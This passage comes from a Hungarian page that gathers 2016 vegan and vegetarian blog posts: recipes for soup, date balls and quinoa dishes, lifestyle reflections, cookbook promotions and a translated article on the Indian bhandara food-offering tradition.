...hogyan őrzik meg egészségüket és maradnak fiatalok az emberek, ...miként készíthetjük el a természet kincseit az európai otthonunkban is könnyedén és ízletesen! Számtalan recept, sok-sok hasznos konyhai tipp és rengeteg természetes alapanyag, diétánkhoz igazítva! "Draga Hanis Szonja! Mai nap megérkezett a nagyszerű könyved a Mit eszik a Világ? Nagyon profi munka, telis-tele jobbnál jobb nemzetközi receptekkel. Minden egyes oldalról árad a szeretet, a profizmus. Imádom a fotókat benne, nemcsak a finomabbnál finomabb ételekről, hanem rólatok és a csodálatos tájairól is! Nagyon gyakran fogunk belőle főzni az már biztos! Első receptem a Fahéjas-Karamellás Granola lesz. :-) Mégegyszer gratulálunk! Dave Raspberry is külön gratulál. A képek alapján úgy jó 100 receptre rá is bökött, hogy mit látna szívesen. A születésnapi menüjét is ebből fogom főzni. Dobai Szabina, vásárló" Kattints ide és nézz bele a könyvbe!
A zöldséges, aki megírja a vásárlóit
Irodalmi stílus, gyümölcsköltemények, praktikus tanácsok és humor. Ez a receptje Magyarország egyik legnépszerűbb zöldségesének. Az általa vezetett üzlet Facebook-oldalának mára több mint kétezer követője van, amely hasznos tippeket és eredeti ötleteket ad vásárlóinak, takaros sorokba szedve.
Egyszerű zöldségkrémleves kakukkfűvel
2016. december 31. Élj harmóniában
Egyszerű zöldségkrémleves kakukkfűvel Itt a tél és ilyenkor mi sem finomabb egy jó meleg levesnél. A levesek egyik fajtája a krémleves, aminek az elkészítéséhez szükséges egy kis konyhai segédeszköz használat is. Én fém botmixert szoktam használni hozzá, de olyan turmixgépet is használhatsz, ami üvegből van és hőálló. Műanyag botmixert csak akkor használj, ha előtte kicsit kihűtötted a levest - a turmixolás után, ilyenkor melegítsd újra a levest . Ezt a levest mindenféle zöldségekből vegyesen szoktam készíteni. Az alapanyagokat kedvedre variálhatod kedvenc zöldségeidből. Mivel 15 éve bio táplálkozó vagyok, minden receptnél odaírom, hogy v egyszermentes (bio) alapanyagokat használj. Szerintem sokkal fontosabb a minőség, mint a mennyiség. Ennél a levesnél nagyon lényeges az alapanyagok minősége, mert teljesen más íze lesz a levesednek, ha a zöldségek vegyszeresek. Pl. e gy vegyszermentes fehérrépa kifejezetten finom és édeskés, én akár önmagában is imádom párolva vagy sütve vagy grillezve . Magyarországon nem sok mindent készítenek fehérrépával és s ajnos a legtöbb levesbe főzött fehérrépa amivel gyerekkoromban találkoztam kesernyés, és rossz ízű volt. Hozzávalók: 4 sárgarépa 1 fehérrépa egy kis fej brokkoli 1 kis fej zeller 1 ek. ghí (tisztított va vagy vegán változatban bármilyen olaj) asafoetida (hagymával helyettesítheted) kurkuma só bors kakukkfű petrezselyem Vegyszermentes (bio) alapanyagokat használj! A levesnek teljesen más íze lesz, ha nem jó minőségűek az alapanyagok. A zöldségeket tisztítsd meg és vágd darabokra, a brokkolit szedd rózsáira és a szárát is aprítsd fel. Melegítsd fel az edényt és tedd bele a ghít (vagy bármilyen zsiradékot). Szórd a ghíbe az asafoetidát, pirítsd egy picit, majd szórd hozzá a kurkumát. Tedd hozzá a zöldségeket, a sót, borsot és egy pici vizet, majd fedő alatt, takarékon párold meg a zöldségeket. Amikor már majdnem megpuhulnak a zöldségek, tegyél hozzá 2 kis ágnyi kakukkfüvet és petrezselymet, majd öntsd fel még annyi vízzel, hogy bőven ellepje a zöldségeket. Addig főzd, amíg a zöldségek megpuhulnak - de ne főzd szét. Majd botmixer segítségével pürésítsd. Tálalásnál a tetejét díszítheted friss petrezselyemmel és kakukkfűvel.
Nézd a teljes képet
2016. december 4. Élj harmóniában
Az életben mindig az van, ami van. A dolgok soha nem jók vagy rosszak - minden nézőpont függvénye. Nem tudjuk előre, hogy egy dolog, ha a teljes képet nézzük, akkor végül is jó vagy rossz. Ha megérted azt, hogy a teljes kép az, hogy mindig minden érted van és a fejlődésedet szolgálja, akkor könnyedén tudod venni az életben az akadályokat és nagyfokú rugalmasságra teszel szert. Ebben a világban a rugalmasság, alkalmazkodóképesség az egyik legfontosabb dolog az életben maradáshoz. Ha megnézed a természetben a viharban a fákat, amelyik hajlong az másnap is ott áll, amelyik mereven áll, annak letörnek az ágai. Figyeld meg az állatvilágot vagy a növényeket, még a folyók is úgy alakítják útjukat, ahogy a legjobban tudnak a környezetükhöz illeszkedni. A világnak mindig csak egy pici részletét látod. Mint amikor megy egy hangya a parkettádon. Legfeljebb csak azt érzékeli, hogy sima vagy egyenetlen a talaj - ahol a mélyedés van. Fogalma sincs róla, hogy ő a szobádban van, ami a lakásodban, ami egy házban, egy adott városban, Magyarországon, Európában, a Föld nevű bolygón...
Tudatos felkészülés a karácsonyra - 7. rész
2016. december 2. Élj harmóniában
Ne engedd, hogy a karácsonyi készülődés feleméssze minden energiádat és pénzedet Szerte a világon, karácsonykor nagyon sok időt, energiát szánnak a családok arra, hogy akár az egész házat kidekorálják karácsonyi izzósorokkal. Szerencsére Magyarországon ez még nem terjedt el. Az izzósorok beszerzése és felrakása már elve sok időt elvesz a hétköznapokból. A világítás ugyan esetenként valóban szép, de nagyon nagy pazarlás a megannyi karácsonyi izzósor használata. Nagyon sok áramot használunk el az elektromos világítással. Légy tudatos karácsonykor is, ha lehet ne pazarold az áramot és a saját pénzedet feleslegesen. Használj karácsonykor hagyományos gyertyákat. Hidd el a kevesebb néha több. A jó hangulathoz nem feltétlenül kell több kilométernyi karácsonyi égő, elegendő néhány hangulatos gyertya a lakás néhány pontján elhelyezve.
Változatos datolyagolyók egyszerűen, akár az ünnepi asztalra is (gluténmentes, laktózmentes, tojásmentes, nyers vegán)
2016. november 15. Zöld Avocado
datolyagolyók (gluténmentes, nyers vegán) A datolya az egyik legősibb gyümölcsünk, mely a Bibliában is fel-felbukkan, és feltehetően már az időszámításunk előtti Mezopotámiában is ismerték és fogyasztották. A datolya az araboknál az őszinteséget, a szépséget és az igazságosságot szimbolizálja. Növényi hormontartalmának köszönhetően az arab kultúrákban gyakran fogyasztják a változókor idején a nők, hogy elősegítsék a hormonháztartás egyensúlyának megtartását. Jelentős természetes kalcium és magnézium forrás, illetve rosttartalmának köszönhetően hozzájárul a tökéletesebb emésztéshez. (Székrekedés és aranyér esetén is a testünk is fellélegezhet napi 1-2 szem datolya fogyasztása után.) Jelentős természetes cukortartalmától gyorsan kapunk új energiára pár szem datolya golyó elfogyasztása után. Főleg, ha a golyókba még ún. szuperételeket is elrejtünk. Népszerű és egyszerű desszert következik, ahol az alap hozzávalók egyformák, az ,,extra hozzávalókkal a végeredmény mégis változatos. Nem kell őket sütni, rengeteg fajta alapanyagból elkészíthetjük, és kb. 15 perc munkát igényelnek. Mutatok nektek 7 különböző ízű datolyagolyó ötletet, melyek csak kiindulási alapok. A variációk száma végtelen! Kísérletezzetek bátran, mert elrontani nem lehet! Melyik recepttel kezditek? HOZZÁVALÓK (fajtánként 15 darab kb. 3 cm átmérőjű golyóhoz) datolyagolyók (nyers vegán)1) narancsos - diós: - 100 g áztatott datolya - 1/2 narancs frissen facsart leve - 2/3 bögre dió ledarálva - meghempergetni reszelt narancshéjban 2) pisztáciás - lime-os: - 100 g áztatott datolya - 60 g apróra tört pisztácia - 50 g darált mandula - 1/2 zöld lime leve és a reszelt héja - 2 ek bio kakaópor / karobpor - megforgatni darált pisztáciába, és reszelt lime héjban Megjegyzés: A datolya mennyisége az áztatott datolyára vonatkozik. (A datolya helyett használhatunk aszalt szilvát is.) 3) chiás - vörösáfonyás 4) mákos - citromos 5) pekándiós - répás 6) almás - diós 7) kókuszos - karobos datolyagolyók (gluténmentes, nyers vegán) datolyagolyók (nyers vegán)ELKÉSZÍTÉS 1) Áztassuk be a mag nélküli datolyát min. 3-4 órára, majd az áztató víz nélkül tegyük az aprítógépbe (Botmixer is jó. Sőt! Ha elég puhára ázott a datolya, akár a kezünkkel szétnyomkodva is pépesíthetjük.) 2) A ,,lekvárrá zúzott datolyát tegyük egy keverő tálba a többi hozzávalóval, majd kézzel gyúrjuk alaposan össze. (Ha túl nedves az alapanyag - függ a felhasznált datolyától - , tegyünk hozzá 1/2 evőkanál útifű maghéjat vagy chia magot vagy még több darált mandulát, hogy keményebb tésztát kapjunk. Ebben az esetben hagyjuk állni a nyers tésztát golyózás előtt, hogy magába tudja szívni a nedvességet az útifű maghéj vagy a chia mag.) 3) Formázzunk golyókat, majd hempergessük meg őket a választott ízesítésnek megfelelő hozzávalóban. 4) Fogyasztás előtt tegyük őket a hűtőbe min. 2-3 órára. datolyagolyók (gluténmentes, nyers vegán) Kíváncsi vagy a többi datolya golyó receptre? Szeretnél még több természetes alapanyagot, zöldséget, gyümölcsöt, magvakat, diófélét fogyasztani, de nincs ötleted, hogyan készítsd el őket? Jön a Karácsony. Érkezik a gluténérzékeny, laktózérzékeny, cukorbeteg vendégsereg. Manapság egyre nagyobb kihívás a különböző diétát követő vendégek igényeit kielégíteni! Szeretnéd, ha mindenki jóllakottan, elégedetten és lenyűgözve hagyná el az otthonod? A Mit eszik a Világ? Ha nem eszik... c. recepteskönyv már Magyarországon is kapható! 170 db egészséges recept, magyar szerzőtől, nyomtatott és elektronikus formában is. Az e-Könyv höz már 1 995 Ft -tól hozzájuthatsz! Kíváncsi vagy rá mit mondanak róla korábbi vásárlóink? Katt a "Ti küldtétek" menüpontra! Szeretnél belelapozni a könyvbe? Itt megteheted: Mit eszik a Világ? Táplálkozz, ne csak étkezz! ;-) datolyagolyók (gluténmentes, nyers vegán) datolyagolyók (gluténmentes, nyers vegán) datolyagolyók (gluténmentes, nyers vegán) datolyagolyók (gluténmentes, nyers vegán)
Megjelent a Vegán Reggeli szakácskönyvem!
2016. október 19. Zizi kalandjai
Október 17-én hétfőn délután kaptam a hírt Kingától, a kiadóból, hogy a kezeiben tartja a könyvemet, ami színes, szagos, vidám és csodaszép! Aznap éjszakába nyúlóan dolgoztam és nagyon vártam már a másnap délelőttöt, hogy érezzem én is ennek a több hónapnyi munkának a gyümölcsét a kezeimben! Nagyon jó érzés volt… igaz nagyobb katarzisra számítottam, de nyilván azt tudtam, hogy mi lesz a könyvben, milyen szöveg, milyen képek, csak azt nem tudtam milyen érzés ezt az egészet könyv formátumban látni papíron! Tényleg, ez a könyv, a harmadik gyerekem lett, egy igazi életmű, ugyanis vasárnap töltöttem be egy szép kerek évfordulót, így ez a könyv ajándék magamnak magamtól! Dedikálás kis segítséggel Bevállaltam a dedikálást, így egy óriás adagnyi könyvet dedikáltam ma a kiadóban azoknak, akik eddig megrendelték a könyvet. Ezúton is köszönöm a támogatásotokat, a gratulációtokat és ígérem: most már nem kell sokat várni, hiszen megjelent a könyv és szerdán elindulnak az előrendelt példányok gazdáikhoz, akik pedig a személyes átvételt kérték azok mehetnek érte a kiadóba (most este kiment egy tájékoztató email a részletekről minden előrendelőnek, szóval figyeljétek a postaládátokat!). A könyv 25%-os, bevezető kedvezményű ára (4990 Ft helyett 3750 Ft!) 2016. október 23-án vasárnap éjfélig tart, ezen a linken tudjátok megrendelni… ha még eszetekbe jut, hogy kit szeretnétek például ezzel a könyvvel meglepni majd karácsonykor! Még egyszer köszönöm a támogatást a családomnak, I.-nek, Ádinak és Ákinak, hogy türelmesek voltak anyával, valamint a Boook Kiadónak, a kiadó dolgozóinak, Péternek, Hajnalnak, Noéminek, Évának, Tamásnak, Kingának, Ildinek, Matyinak, Milánnak a fotósnak, Áginak a stylistnak, Kármennek a gasztronómiai asszisztensnek, Rékának – aki Ákosra vigyázott és a Biorganik Online Kft-nek, akik támogatták a könyvem megjelenését, valamint a Pipacs Pékségnek – akik biztosítottak kenyeret a fotózáshoz és a Planetbio Magyarországnak – akik a szuperélelmiszereket biztosították a receptek teszteléshez. Na és persze hatalmas köszönet nektek, akik olvassátok a blogomat, kommenteltek, kérdeztek, ötleteket adtok, mert a ti lelkesedéseteknek is hála, hogy ez a könyv most már nem csak álom csupán, hanem egy kézzel fogható színes mű, amit bármikor a kezetekbe vehettek, ha inspirációra van szükségetek a nap indító reggeli vagy brunch készítéséhez. Ha bárki posztol fotót a könyvről, vagy az elkészült ételről/italról, amit a könyvből készített, akkor használjátok Instagramon és Facebookon is ezeket a hashtageket, mert figyelni fogom őket: #veganreggeliszakacskonyv és #zizibreakfastcookbook. Tervezem, hogy a legjobban készült ételfotókat jutalmazni fogom! Dedikált példányok egy része… A másik szuper hír pedig, hogy a Vegán Reggeli mellett megjelent Bede Anna (vegasztrománia) második könyve (szintén a Boook Kiadó gondozásában), a Vega Budapest, ami nem szakácskönyv, hanem 16 népszerű magyar művészt, 16 éttermet és 16 receptet bemutató igazán szórakoztató mű… valami olyasmi, amivel bekuckózhatunk a kanapén egy pohár ital társaságában és észre se vesszük, hogy eltelik az idő az olvasása közben!
Utazás a Skiphop-pal + kedvezménykupon
2016. október 10. Zizi kalandjai
Itt azt írtam, hogy nincs annál cukibb, hogy a másfél évesünk hátán egy pici hátizsák van. Hát igen, azóta eltelt még másfél év és a három évesünk hátán ugyanaz a hátizsák virít, csak úgy tűnik a hátizsák kisebb lett… pedig nem… a másfél évesünk nőtt meg. Egy három évesnek már saját utazó bőrönd is jár és ez is übercuki, hogy egy saját kis bőröndöt húz maga után! A cuki majmos bőrönd jó méretekkel rendelkezik (30x40x14 cm). Rövidebb útra bele lehet pakolni a ruhákat, hosszabb útra pedig használhatjuk a saját kincsek (játék, mesekönyv, kavics, ceruzák, stb.) szállítására (ilyenkor a ruhákat anya vagy apa cipeli nálunk). Egy nagy belső fakkja van, kívül pedig egy cipzáros rekesz, amin belül van egy hálós “rekesz”, a bőrönd egyik oldalán pedig egy szintén hálós fakk apró dolgoknak vagy palacknak. A bőröndnek két kereke van, az elején pedig két kis támasztója, így a saját “lábain” megáll. Tartozik hozzá egy fel- és lecsatolható pánt, amely segítségével a szülő a vállára tudja tenni a bőröndöt, ha már a gyerek nem akarja húzni. Mindannyian tudjuk szülők, hogy van olyan pillanat, amikor már nincs kedve húzni a gyereknek a saját táskáját. A majmoson kívül van katicás, kutyás, méhecskés és baglyos változat is. A kis hátizsákot továbbra is az apró dolgoknak tartjuk fent. Ebbe kerül mesekönyv, uzsonna, kisautó, fertőtlenítő kendő, mikor mit szeretne Ádi magával vinni. Ezt nemcsak utazáskor, hanem városban mászkáláskor is magával szokta vinni. Mindig jelzem neki, hogy csak annyi dolgot tegyen bele, amennyit tényleg tud cipelni, mert neki kell hoznia. Persze itt is eljön az a pillanat, amikor nekem kell tovább cipelnem, de nyilván felesleges súlyokat nem szeretnék, amikor vagy magamon cipelek egy másik kisbogyót vagy a babakocsiban tolom, de plusz súlynak plusz súly egy kis teletömött hátizsák is. Igyekszem Ádit abba az irányba terelgetni, hogy a saját dolgaiért felelősséget kell vállalnia. Első önálló nélkülünk töltött vakációjára az idén ment először Ádi, Szegedre a szüleimhez. Mi szülők nagyon izgultunk, hogy mi lesz, de Ádi annyira jól érezte magát a nagyiékkal, olyan sok programban volt része, hogy telefonon is csak egy sziát köszönt nekünk, aztán rohant is valami izgalmasat csinálni. Szóval szerencsére nem hiányoztunk neki, ő nekünk viszont igen. Kicsi korától (2 hónapos) vonatozik Ádi, amit nagyon jól megszokott és szeret is vonatozni. Most, hogy már saját bőröndje van, nagyon élvezi az utazást… neki is van olyan húzós táskája, mint anyának. A vonatos utazást a cuki, puha nyakpárna teszi még kényelmesebbé. Jól tartja a nyakát, könnyű a segítségével álomba szenderülni, legalábbis én tudnék, de persze Ádinak minden izgalmas az utazás során, tehát nem szeret időt pazarolni alvásra. Anya viszont annál inkább szeretne, de nekem nem adatik meg ez a luxus a vonaton! Ez is kapható katicás, kutyás, méhecskés és baglyos változatban. A Skip*Hop elérhető az alábbi linkeken: – weboldal – Facebook oldal Skip*Hop Magyarország és Monkie A termékeket a {Monkie} biztosította a teszteléshez. A véleményem csakis a sajátom. ***** KEDVEZMÉNYES VÁSÁRLÁSI LEHETŐSÉG A ZIZI KALANDJAI OLVASÓINAK!!! A SkipHop Magyarország felajánlotta, hogy kedvezménykupont biztosít a Zizi kalandjai olvasóinak! Aki 2016. október 10 és október 31-e között vásárol Skip Hop, Stor it márkájú termékeket a Monkie oldaláról az 10% kedvezményben részesül (a végösszegből kerül levonásra). A kupon más akcióval és kedvezménnyel nem vonható össze. A kuponkód, amelyet megrendeléskor be kell írni a kedvezmény érvényesítéséhez: zizitel2016. Jó vásárlást mindenkinek!
Zöldséges quinoa-val töltött gombafejek
Ezt a receptet azért is írom le és osztom meg, mert legutóbbi magyarországi látogatásunk alkalmával néhány embernek quinoa-t vittem ajándékba. Itt több helyen kapható, s amint korábban írtam a Grape Tree nevü üzlet (egyik kedvenc boltom) jobb áron kínálja, mint Magyarországon bárhol láttam eddig. Ha már Angliában nincs TV paprika, se igazi besztercei szilva, meggyet idén itt nem is ettem, akkor legalább quinoa-t olcsóbban kapok. Ha a quinoa első készítéskor kesernyés ízű, következő alkalommal áztassuk pár percig hideg vízben, vagy mossuk át. Én nem szoktam mosni, s nem is érzem kesernyésnek. Igazából egy jó fűszerezéssel és zöldséggel igazán finom étel lesz belőle. Ráadásul nem hízlal. Fehérjében viszont gazdag. Több fehérje van benne, mint a búzában vagy a kölesben. Gluténmentes gabona. A recept Hozzávalók: - néhány fej gomba (jelen esetben 15-16 közepes méretű) - kb 2 dl bögrényi mirellit zöldborsó - 1-2 paprika - vegán sajt / sörélesztő pehely / füstölt tofu / lila hagyma Elkészítés: A gombákat megmossuk, törzsület kivágjuk, felaprítjuk, megsózzuk, enyhén megpároljuk. A gombafejeket egy tepsibe helyezzük, enyhén megsózzuk őket. A zöldborsót és paprikát szintén enyhén megsózva megpároljuk. A quinoa-t enyhén sós vízben puhára főzzük. A víz ellepje, de nem kell kétszeres mennyiségű víz. A zöldségeket összekeverjük a megfőtt quinoa-val, ételízesítővel picit megszórjuk, ha nem elég ízes, majd a gombafejeket megtöltjük. Vegán sajtot reszelünk a tetejére, ha nincs, füstölt tofu szeleteket teszünk rá, ha az sincs, lila hagyma-karikákat helyezünk a gombákra vagy sörélesztő pehellyel megszórjuk a töltelék tetejét. Kb. 20 perc alatt megsütjük őket. A quinoa-t édesen is elkészítheted. Íme néhány édes és sós recept, amiket kedvedre, ízedre át is alakíthatsz: Málnás-brazil diós quinoa Erdei gyümölcsös quinoa Fokhagymás sült patiszon quinoa-val (patiszon helyett cukkinit is használhatsz!)
9 #magyar #vegán #foodinstagrammer, akikről tudnod kell
2016. szeptember 5. Vegangster
A vegán ételek egyre népszerűbbek Magyarországon is, bár még mindig sok a kétkedő velük kapcsolatban. Ugyan mi mással lehetne a sztereotípiákat ( ti füvet esztek? ) cáfolni, mint egy jó Instagram fotóval mondjuk egy vegán palacsintáról, vagy egy csodás fahéjas almarózsáról, esetleg egy mutatós vegán burgerről.Íme 9 magyar vegán Instagram oldal, amit érdemes követni:Green Evi - Oravecz Evihttps://www.instagram.com/green_evi/aspirationbynora - Sipos
Vegán fashion 2016
2016. augusztus 29. Vegangster
A cruelty-free illetve a vegán divat márkák ma már szerencsére nagy számban jelen vannak a piacon, kiváltképp az online kereskedelemben. Az alábbi listában ezekből szedtünk össze néhányat - a teljesség igénye nélkül - főleg olyan cégek közül, akik elérhetőek Magyarországon is. Jó böngészést!TáskákAlexandraKCOS? COS?CorkorCorklaneDenise RoobolMiomojoWilbyMatt&NatLaBanteStella McCartneyCipőkArauto RAP (gyermek cipők)Bourgeoise BohemeCammina LeggeroCOS? COS?By BlanchWillsBeyond SkinNoahNAK
Szvámí Véda Bháratí: Mi a Bhandara?
2016. augusztus 19. Eszemiszom – Jóga Magazin
Az ősi kultúrákban mindenhol szerepel az étel Istennek való, tiszteletteljes felajánlása. Indiában ez az egyik leggyakoribb formája a ,,szentség kinyilvánításának. Az ország különböző részein különböző elnevezést használnak rá. A punya-arjana, ,,a jó karma elnyerése kategóriájába tartozik. Egy olyan országban, mint Thaiföld, ahol több ezer szerzetest kell eltartani, a cselekvés ezen kategóriának fordítása jótett, és nem jót evett. (Ez egy szójáték: merit-making, not merry-making.) Az indiai (vagy az ősi ázsiai és afrikai) kultúrákon kívül élő barátaink és tagjaink számára a fentiekhez hasznos lehet az alábbi magyarázat: A szikhek például 24 órás langart szoktak tartani a gurudwaráikban (szikh templom, szó szerinti jelentése: a Guru Kapuja), ahová bárki betérhet enni. A Vallások Világparlamentjében, melyen 2006-ban vettem részt Barcelonában, a szikhek egy hatalmas langart hoztak létre egy tengerparti területen, ahol a parlament több ezer résztvevője naponta háromszor étkezhetett. Nemrég, amikor a londoni Heathrow repteret lezárták a hó miatt, és több ezer utas ott rekedt, a Szikhek egy langhart állítottak föl, hogy ott ételt és italt osszanak az utasoknak. Az emberek minden szent, ünnepi vagy épp szomorú alkalommal egyfajta szent, tiszteletteljes módon veszik magukhoz a táplálékot. Nem szabad megfeledkeznünk arról, hogy ez nem egy közösségi ünneplés, hanem egy szent felajánlás Istennek, kinek templomai vagyunk. Ebben a tudatban végzik. A bhandara célja, hogy az istentiszteleti attitűd, hangulat és jellegzetességek fennmaradjanak. A yajamana (az Istennek az ételt felajánló személy) úgy dönt, hogy felszolgálja az ételt az ,,egy sorban ülő emberi istenségeknek, mások segítségével. Ha a yajamana nem lehet jelen, az ételeket az ő nevében szolgálják fel. Sok asrám Rishikeshben és Haridwarban teljesen a bhandara elve alapján működik, a felajánlásokat minden nap az asrám hívei biztosítják. Egy bhandara felajánlása például a következő célokat szolgálhatja: - egy elhunyt testvérre való emlékezés, - esküvő vagy születésnap megünneplése, - beavatási évforduló megünneplése, - egy 40 napos csendgyakorlás lezárása, - a guru-purnima vagy más szent ünnep alkalmából, - egy puras-csarana végén vagy akár annak minden napján tűzáldozat mellett. Valamennyi társunkat és barátunkat arra biztatjuk, hogy ajánljon fel bhandarát az asrámnak születésnapja vagy beavatási évfordulója alkalmával. A nyugati országokban (és manapság az indiai társadalom néhány modernizált szintjén) a születésnapját ünneplő személy ajándékokat kap, míg Indiában az ünnepelt személy ad ajándékokat. A királyok és más jómódú emberek gyakran rendeznek tulá-dánát, ami szó szerint azt jelenti, hogy mérleges adakozás. Megmérik az adott személy tömegét, konkrétan beleültetik a mérleg egyik felébe, míg a másik felét megtöltik gabonával, pénzérmékkel, arannyal, ezüsttel vagy akár drágakövekkel - attól függően, hogy az adott személy milyen anyagi háttérrel rendelkezik. Majd ezeket az értékeket, melyek tömege megegyezik az adott személy tömegével, szétosztják a szegények, a rászorulók vagy a szent emberek között. Az asrámban egy étkezéskor felszolgált étel összköltsége átlagosan négy-ötezer rúpia (2011-es adat). A főszezonban közel száz, a kevésbé sűrű időszakban kb. 50 fő lakik itt. Ha szeretnéd elnyerni a punyát (jó karma) azáltal, hogy az asrám egy teljes napi étkezését biztosítod, ennek költsége kb. 11.000 rúpia. Várakozással tekintek az elé, hogy asrámunk sok barátja elnyerje ezt a punyát, ezt a jó karmát. Akár szankalpa (szent elhatározás) formájában is elkötelezheti magát valaki, hogy az elkövetkező 5, 10, 15 vagy 20 évben ilyen felajánlásokat tegyen. Fordította: Réz Brigitta Forrás: http://ahymsin.org/main/misc/celebrate-your-birthday-or-initiation-with-a-bhandara-to-the-ashram.html
Málnás-brazil diós quinoa
A receptet és az ételt egyedivé teszi a paradió, másnéven brazil dió. Aránylag kevés receptet látok a magyar gasztroszférában paradióval. Leginkább diákcsemegékben találkozhatunk vele. Meglehetősen sok kalciumot, káliumot, magnéziumot, vasat, foszfort és meglehetősen jelentős szelént tartalmaz, no és zsírt. Mintegy 60-70%-a zsír, ezért óvatosan fogyasszuk. Magas szeléntartalmának köszönhetően pajzsmirigy-betegek számára jótékony hatású. Brazildió fák szinte kizárólag érintetlen őserdőkben hoznak gyümölcsöt. Nagyüzemi termesztése sehol sem sikerült, mivel hiányoznak a virágok beporzásához szükséges méhek és más rovarok. Csak néhány erre a virágra specializálódott rovar képes a beporzásra. Megporzás után a termés, csak 14 hónap után érik meg. A termés nagy, 10-15 centiméter átmérőjű, gömbölyű, csonthéjas tok, melyben 8-24 darab háromszög alakú és 4-5 centiméter hosszú mag található. A tok fás héja 8-12 milliméter vastag. Másik érdekesség, hogy egy a brazildió fán élő orchidea illata vonzza a fához a méheket. A természet e komplex megoldása nélkül a fa nem hoz termést. A fa szaporodása is különleges. Termésének vastag héját csak egy őserdei rágcsáló, az aguti képes feltörni. A magokat a mókusokhoz hasonlóan elraktározza, és a rejtekhelyeket gyakran elfelejti. Ezekből az őserdőben elszórt raktárokból kelnek ki az új fák. Ha az elültetett helyen nincs elég napfény, a kis növény, évekig is várhat amíg kicsírázik. Habár az egyik neve brazíldió, a legtöbb paradiót Bolíviában gyűjtik be, körülbelül a világszintű termés 50%-át. Brazíliában 40%-ot és Peruban 10%-ot. A recept Hozzávalók: - 20 dkg quinoa - 5 dl növényi tej (nekem szójatej volt otthon) - 1 nagyobb bögre málna (akár fagyasztott is lehet) - 1kis marék brazil dió (paradió) Elkészítés: A quinoát vastag szűrőn keresztül átmossuk, majd annyi tejben, ami jól ellepi, puhára főzzük. Ha elfőtt róla az összes tej, még adhatunk hozzá. Ha édesen szeretnénk, édesíthetjük banánnal. A gyümölcsszemeket a tetejére helyezzük az egész és/vagy lapokra vágott mandulával. Nem hozzákeverjük, hogy a málna ne törjön össze.
Mit eszik a Világ? Ha nem eszik... ÚJ! egészségtudatos vegetáriánus, vegán RECEPTKÖNYV a piacon
Körülbelül 1 évvel ezelőtt egy barátnőm apukája, akit akkor láttam életemben először, teljesen rezzenéstelen arccal megkérdezte tőlem, hogy miért nem írok könyvet? Én egyből kinevettem és különböző kifogások hosszas tárházát vonultattam fel pár perc alatt. De aztán ez az egyszerű, körítésmentes, és direkt kérdés befészkelte magát az agyamba. Biztosan ismeritek ezt az érzést. Nap, mint nap emberek sokaságától kapunk több száz kérdést, amire hol válaszolunk, hol nem. A kérdések jönnek-mennek. Aztán ritkán, de néha előfordul, hogy kapunk egy kérdést, ami velünk marad. Amit hazaviszünk a fejünkben. Amit többször megrágunk, megpróbálunk magunknak kimagyarázni, keressük a kifogásokat, de legbelül mélyen érezzük, hogy valamit elindított bennünk az a kérdés. A tagadásból hárítás lesz, majd megbékélés a gondolattal, ezután átkerül a "miért is ne?" kategóráiba, míg végül elfogadás és újabb terv lesz belőle! Egy egyszerűnek tűnő kérdés a semmiből, egy idegentől, ami végül megváltoztatja az életünket! :-) Most 1 évvel később büszkén és boldogan mutathatom be nektek a MIT ESZIK A VILÁG? Ha nem eszik... című könyvet. Életem első könyve, de annyira megszerettem közben az írást, és olyan sokmindent megtanultam magamról, hogy a "helyemen vagyok" érzés megtalált, úgyhogy fejben már készül a folytatás... Az eddigi visszajelzések alapján, ti is szívesen olvassátok soraimat, és készítitek el családotok számára a recepteket. Aki ismer, tudja, hogy két nagy szerelmem van (természetesen a férjem után), ami olyan tipikusan Szonjás. Az egyik a vendégvárás (finom ételek készítése másoknak), a másik az utazás. Bármikor bárhová! ;-) Ismerkedni a Világgal, az ismeretlen kultúrákkal, az idegen tájakkal, az új ételekkel és ízekkel. Felfedezni, tanulni, fejlődni! Amióta az eszemet tudom, minden szabadon elkölthető pénzemet utazásra fordítottam. Nem érdekelnek a drága ruhák, a márkás műszaki cikkek, nem gyűjtök az otthonomba felesleges tárgyakat, de annál több élményt és kalandot a Világ körül! Bármikor készen állok új országba költözni, hogy egy kis időre közelről szemlélhessem a helyi kultúrát és szokásokat. Már számtalan országban jártam, de még mindig úgy gondolom, Magyarország a legszebb ország. Csodálatos földrajzi fekvéssel és éghajlattal, rendkívül gazdag látnivalókkal és programlehetőségekkel, miközben finom, helyi zöldségekből és gyümölcsökből készült ételekkel táplálkozhatunk. Most egy kis ideig még Világot járunk, aztán egy nap majd erősebb, teljesebb és jobb emberként "haza" érek. Már tisztelni fogom azt, akit addig nem tiszteltem, és hálás leszek mindazért, ami előtte természetes volt. "A világ egy könyv, és akik nem utaznak, csak egy oldalt olvasnak belőle!" /Aurelius Augustinus/ Így tehát mi is lehetne más a könyv témája, mint az utazás és a finom ételek? ;-) Egészségtudatos receptek és izgalmas útikalandok várnak a könyv 284 oldalán keresztül. Mindezek mellett hasznos egészségmegőrző tippek és konyhai trükkök, TOP10 listák, interjúk, színes képek, rengeteg humoros köntösben tálalt inrformáció, és 170 vegetáriánus recept várja a kedves olvasót. A RECEPTEKRŐL, ALAPANYAGOKRÓL A receptek válogatásakor azt tartottam szem előtt, hogy minél többféle olyan alapanyagot betudjak mutatni nektek, melyek nem feltétlenül tartoznak egy hagyományos magyar konyha bevásárlólistájára, pedig ma már könnyedén elérhetőek egy-egy online webáruház, vagy nagyobb egészségtudatos szupermarket kínálatából, de a városi bioboltok polcain biztosan megtaláljuk. (Nagy szeretettel és lelkesedéssel ajánlom a magyar online webáruházakat, melyek nemcsak, hogy 24 órás nyitvatartással rendelkeznek, de még cipekednünk sem kell, hisz az ajtónkig szállítják a nehéz lisztet és cukrot.) Alapanyagok, melyek a természetben is megtalálhatóak és több millió ember fogyasztja őket nap, mint nap a Világ más-más pontjain, már több ezer éve. Ilyen például a rizs helyett fogyasztható szuperegészséges quinoa vagy hajdina. Az édesburgonya is egyre népszerűbb a magyar piacokon, és a tavaszi epres-rebarbarás sütemény költemények is egyre több konyhatündér számára kötelező ízkombináció. Nem is szeretném felsorolni azt a több száz zöldséget, gyümölcsöt, magot, gabonát, melyek főszereplői a MIT ESZIK A VILÁG? Ha nem eszik... c. könyvnek. A könyv nemzetközi recepteket tartalmaz, magyar ízlelőbimbóval ellátott szerzőtől, európai vásárlási lehetőségekkel. Az egészségtudatosság mellett az ételintoleranciákra is figyeltem a könyv készítése során, így minden receptnél fel van tüntetve, hogy milyen "mentes" az étel. MIT JELENT A CÍM? A ,,MIT ESZIK A VILÁG?, azért született meg, hogy nemzetközi tapasztalataim és tanulmányaim alapján megválaszoljam azokat a gyakran nekem szegezett 